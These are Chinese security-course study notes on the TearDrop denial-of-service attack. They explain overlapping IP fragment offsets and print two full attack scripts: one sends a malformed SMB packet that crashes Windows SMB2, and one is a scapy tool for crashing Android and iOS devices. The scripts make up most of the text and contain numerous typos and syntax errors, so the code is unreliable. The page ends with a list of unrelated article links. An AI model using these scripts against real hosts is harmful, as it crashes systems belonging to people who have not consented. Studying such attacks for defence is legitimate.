【安全牛学习笔记】TearDrop
来源:互联网 发布:怎么代理淘宝网店步骤 编辑:程序博客网 时间:2024/06/05 12:01
TearDrop
主要针对早起微软操作系统(95、98、3.x、nt)
- 近些年有人发现对2.x版本的android系统、6.0 IOS系统攻击有效
原理很有趣
- 使用IP分段偏移值实现分段覆盖,接收端处理分段覆盖是可被拒绝服务
攻击效果
- 被攻击者蓝屏、重启、卡死
{ <- PAYLOAD 最大 1480 字节(全部参与计算机offset) -> }
┌───┬───┬───┬───────────────────────────┬───┐
│MAC头 │ IP头 │上层头│ DATA DATA │ FCS │
└───┴───┴───┴───────────────────────────┴───┘
{ <- Total Length 最大 1500字节 -> }
{ <- 以太数据网包,最大1518字节 -> }
C:\User\yuanfh>ping -1 4000 192.168.1.1
OmniPeek -> ICMP
TearDrop
Ping大包,比较正常分段与teardrop攻击流量的区别
针对早起windows系统SMB协议的攻击
- teardrop_smb.py
针对 Androis、IOS系统的攻击
- teardrop_android_ios.py
攻击向量并不确定,要是具体协议分析
root@K:~# cp /media/sf_D_DRIVE/teardrop_* .
root@K:~# ls
Desktop Downloads hs_err_pid2077.log Pictures teardrop_android_ios.py Templates
Documents hs_err_pid1982.log msuic Public teardrop_smb.py Videos
root@K:~# rm *.log
root@K:~# ls
Desktop Downloads Pictures teardrop_android_ios.py Templates
Documents msuic Public teardrop_smb.py Videos
----------------------------------------------------------------------
root@K:~# geany teardrop_smb.py
#!/usr/bin/python
# when SMB2.0 recieve a "&" char in the "Process Id High"
# SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
import sys
from socket import socket
from time import sleep
#host = sys.argv[1],446
host = "192.168.20.17",445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x72\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close
----------------------------------------------------------------------
root@K:~# geany teardrop_android_ios.py
#!/user/bin/env python
import sys
from scapy.all import *
total = len(sys.argv)
if total !=3
print "Performs teardrop attack from Kali linux"
print " "
print "Usage: ./tear TARCET-IP ATTACK-CODE"
print " Attacl Codes:"
print " 0: small payload (36 bytes), 2 packets, offset=3x8 bytes"
print " 1: large payload (1300 bytes), 2 packets, offset=80x8 bytes"
print " 2: large payload (1300 bytes), 12 packsts, offset=08x8"
print " 3: large payload (1300 bytes), 2 packets, offset=3x8 bytes"
print " 4: large payload (1300 bytes), 2 packets, offset=10x8 bytes"
target =str(sys.argv[1])
attack=sys.argv[2]
print 'Attacking target' + target + 'with attack' + accack
if attack == '0':
print 'Using attack 0"
size=36
offset=3
load1="\x00"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
elif attack == '1':
print "Using attack 1"
size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
elif attack == '2':
print "Using attack 2"
print "Attacking wiht attack 2"
size=1300
offset=80
load="A"*size
i=IP()
i.dst=target
i.proto=17
i.flags="MF"
i.frag=0
send(i/load)
print "Attack 2 packet 0"
for x in range(1, 10)
i.frag=offset
offset=offset+80
send(i/load)
print "Attack 2 packet " + str(x)
i.frag=offset
i.flags=0
send(i/load)
elif attack == '3':
print "Using attack 2"
size=1336
offset=3
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
size=4
offset=18
load2="\x00"*size
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
else: # attack==4
print "Using attack 4"
size=1300
load="A"*size
i=IP()
i.dst=target
i.flags="MF"
i.proto=17
j=IP()
j.dst=target
j.flags=0
j.proto=17
j.frag=offset
send(i/load1)
send(j/load2)
prubt "Done!"
----------------------------------------------------------------------
root@K:~# ./teardrop_smb.py
- 【安全牛学习笔记】TearDrop
- 【安全牛学习笔记】WPA安全系统
- 【安全牛学习笔记】python学习笔记
- 【安全牛学习笔记】搜索引擎
- 【安全牛学习笔记】端口扫描
- 【安全牛学习笔记】TOR
- 【安全牛学习笔记】SHODAN
- 【安全牛学习笔记】 端口扫描
- 【安全牛学习笔记】NEXPOSE
- 【安全牛学习笔记】POP3
- 【安全牛学习笔记】FUZZING
- 【安全牛学习笔记】抓包嗅探
- 【安全牛学习笔记】vega
- 【安全牛学习笔记】w3af
- 【安全牛学习笔记】skipfish
- 【安全牛学习笔记】Arachni
- 【安全牛学习笔记】OWASP_ZAP
- 【安全牛学习笔记】Burpsuite
- LeetCode90 Subsets II
- c++函数学习
- spring boot+logback+JdbcTemplate打印sql日志
- C++快速排序的实现
- 构造邻接表
- 【安全牛学习笔记】TearDrop
- 构造十字链表
- POJ1226-Substrings
- 深度学习深理解(一)-logistic回归深理解与BP反向传播算法
- Android 读写文件
- bzoj1293: [SCOI2009]生日礼物 单调队列
- 就地逆置
- 10.15 周日 阵雨 早起 关于物品栏的翻页及Toggle Group组件 Mask遮挡模型 Scroll rect 滚动列表的熟悉和使用
- 实验3.1 顺序栈&链栈